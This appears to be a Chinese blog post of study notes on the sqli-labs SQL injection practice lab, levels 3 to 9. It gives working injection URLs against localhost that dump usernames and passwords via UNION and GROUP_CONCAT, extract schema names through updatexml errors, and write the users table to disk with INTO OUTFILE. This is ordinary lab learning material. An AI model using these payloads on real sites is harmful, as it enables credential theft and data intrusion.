sql测试平台3-最后一关

最新推荐文章于 2021-11-05 18:45:28 发布
最新推荐文章于 2021-11-05 18:45:28 发布
阅读量155 收藏
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luoshiyong123/article/details/88991128
版权

less3:

id存储格式为id=('1'),所以测试的时候http://localhost/sqll/sqli-labs-master/Less-3/?id=3’)%23才对

less4:

id存储格式为id=("1")http://localhost/sqll/sqli-labs-master/Less-4/?id=1%22)%23

介绍group_concat用法

group_concat([DISTINCT] 要连接的字段 [Order BY ASC/DESC 排序字段] [Separator '分隔符'])

爆出第四关所有用户名和密码:

CONhttp://localhost/sqll/sqli-labs-master/Less-4/?id=3") union select 1, GROUP_CONCAT(username),GROUP_CONCAT(password) from users ORDER BY id LIMIT 0,1 -- a

less5==基于错误的注入

Count()    //计算总数

Concat()    //连接字符串

Floor()    //向下取整数

Rand()    //产生0~1的随机数

rand(0)    //序列是011011

首先可以看出这是单引号型,然后不同的是只能根据报错信息来判断

看到数据库长度:localhost/sqll/sqli-labs-master/Less-5/?id=1' and length(database())>=8%23  //为8

and left(database(),2)=’se’--+  //猜

updatexml函数:https://blog.csdn.net/vspiders/article/details/77430024

爆出数据库名:localhost/sqll/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) %23

爆出表名:localhost/sqll/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) %23

注意中间select group_concat的使用

less6

同less5,不过这里是双引号型

导出文件注入

less7

通过id=1&&id=1'&&id=1"的不同可以确定id存储格式为id=(('1'))

http://localhost/sqll/sqli-labs-master/Less-7/?id=1'))--+

注入信息到服务器文件:

http://localhost/sqll/sqli-labs-master/Less-7/?id=-1')) union select 1,2,3 into outfile "D:\\1234\\1.txt"--+

ps:路径问题:mysql中my.ini中必须要指定secure_file_priv路径,如果没有自己写一个路径

ps2:1.txt不存在于该目录下

然后就可以爆数据库-》爆数据表-》爆用户名和密码

http://localhost/sqll/sqli-labs-master/Less-7/?id=-1')) union select database(),2,select * from security.users into outfile "D:\\1234\\1.txt"--+

===爆密码和用户

http://localhost/sqll/sqli-labs-master/Less-7/?id=-1')) union select database(),GROUP_CONCAT(username),GROUP_CONCAT(password) from security.users into outfile "D:\\1234\\1.txt"--+

less8

盲注:猜数据---https://www.jianshu.com/p/5989d0dfa227--写python脚本

时间注入也可采用不过速度会慢一些

less9

不要绝望总会慢慢变强
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入测试平台 SQLol-2.SELECT注入测试
缘木之鱼
04-18 708
SQLol - Challenge 0 - Hello, world! 完整Select语句: SELECT 【username】 FROM 【users】 WHERE username = 【‘1’】GROUP BY 【username】 ORDER BY 【username】 ASC [having 【1=1】][limit 【0,1】] 接收的参数可能拼接到上述语句中【】的任一个位置。 ...
常见的SQL在线练习平台
Java_Fly1的博客
07-20 857
SQL在线练习和学习的网站
Sqli-Labs闯关—Less3
weixin_39157582的博客
08-19 220
Sqli-Labs闯关—Less3 基于错误的GET单引号变形字符型注入 (1)判断注入类型 输入?id=1’ 页面显示不正常,出现一个括号),怀疑sql语句是以括号闭合的 http://localhost/sqli-labs-master/Less-3/?id=1’ 输入?id=1’)–+页面回显正常,说明此处是字符型注入,而且是以(’’)的方式闭合字符串的。 (2)使用order by判断列数 输入order by 3页面回显正常,输入order by 4页面回显不正常,说明列数为3列。
CTF/CTF练习平台 --SQL注入测试sql宽字节注入与#,#】
Sp4rkW的博客
08-19 1万+
原题内容: http://103.238.227.13:10083/ 这题其实就是考验sql注入基本功,写个wp记录下自己的几个失误点,与大家共同学习 首先,打开页面可见 题目提示的很明显了,这是一个注入题,我们肯定得找到注入点,一般的思路都是'闭合导致注入,关键是找到什么数据被传入了数据库,才能确定注入点 按照常规思路,习惯性加上一个index.php,...
benchmarksql数据库测试工具--支持达梦数据库版
03-21
"benchmarksql-5.0" 是BenchmarkSQL的特定版本,包含了所有用于测试达梦数据库的源代码和可执行文件。用户可以通过解压这个文件来获取完整的测试工具。 总的来说,BenchmarkSQL支持达梦数据库的版本提供了一个强大...
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
简单SQL表模糊测试-Golang开发
05-26
将随机数据加载到SQL表中以进行测试。 该工具可以获取SQL表的布局,并用随机数据填充它。 SQLfuzz将随机数据加载到SQL表中以进行测试。 该工具可以获取SQL表的布局,并用随机数据填充它。 用法转到安装github....
sql基础教程-软件测试必备
03-28
软件测试相关的内容均有,更深入的理解数据库及相关使用
Hudi TCP-DS 测试 SQL 脚本
06-20
TCP-DS是业界测试数据库、数据仓库的一个工具库,共计 24 张表,TCP-DS 会自动生成数据,同时生成 99 个查询语句,平时可以看到很多评测中的 SQL99 就是这个它了。原生支持 Oralce、SQLServer,其他数据存储需要针做...
在线就能用的 SQL 练习平台我给你找好了
Rocky0429
11-18 2万+
都给你找好了,只管用!
SQL在线练习网站
gabby____的博客
07-04 10万+
介绍一款好用的在线SQL语句练习工具,详情见下图。软件的地址是:http://sqlfiddle.com/   
SQL注入原理讲解,很不错!
热门推荐
stilling2006的专栏
01-21 39万+
原文地址:http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html 1.1.1 摘要 日前,国内最大的程序员社区CSDN网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。 网络安全成为了现在互联网的焦点,
在线sqlserver_分享 5 个免费的在线 SQL 数据库环境
weixin_35998791的博客
01-25 8773
今天给大家分享几个在线的免费 SQL 运行环境,也就是在线数据库。这些网站可以帮助我们快速运行一些 SQL 语句的测试或者验证,同时还可以在网络上进行分享,关键不需要自己安装数据库。SQL FiddleSQL Fiddle 提供了 MySQL、Oracle、PostgreSQLSQLite 以及 SQL Server 数据库环境,使用时无需注册。其中,左侧文本框用于输入初始化语句创建表结构和数据...
SQLi-Labs 学习笔记(Less 1-10)
Onlyme的博客
03-11 1万+
点击打开链接http://blog.csdn.net/u012763794/article/details/51207833http://blog.csdn.net/u012763794/article/details/51361152http://blog.csdn.net/u012763794/article/details/51457142Less-1 基于错误的 - get 单引号 - 字...
墨天轮MySQL免费在线SQL测试服务器
weixin_55094944的博客
11-05 296
墨天轮在线实训平台V1.0发布,免费提供部署好的数据库线上环境,可以随时随地打开浏览器学习,一键连接Linux WEB终端,目前已支持Oracle、MySQL、Redis、PostgreSQL、openGauss、MogDB。 秉承乐知乐享同心共济的愿景,现对广大技术爱好者开放免费90天限时申请:墨天轮->云市场->云上资源云市场 - 墨天轮 如下是MySQL实训环境,使用chrome浏览器一键连接到底层操作系统命令行终端,可以进行操作系统命令学习,可以连接到数据库做任何操作、测试、实验。.
sql注入之——sqlmap使用
wsnbbz的博客
02-11 505
sqlmap基本使用 获取一个url: http://localhost/sqli-labs-master/Less-1/?id=1 判断是否有注入 python sqlmap.py –u “http://localhost/sqli-labs-master/Less-1/?id=1” get型注入 查看所有数据库:python sqlmap.py –u “http://localhost/sq...
JAVA实践期末复习题.docx
最新发布
07-10
JAVA实践期末复习题.docx
SQL SERVER实用教程 T-SQL语言.pdf
04-17
"SQL SERVER实用教程 T-SQL语言.pdf" 这篇教程详细介绍了SQL Server中的T-SQL语言,T-SQLSQL语言的一个特定版本,专用于微软的MSSQL-Server和Sybase Adaptive Server系列数据库。SQL,即结构化查询语言,起初由...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值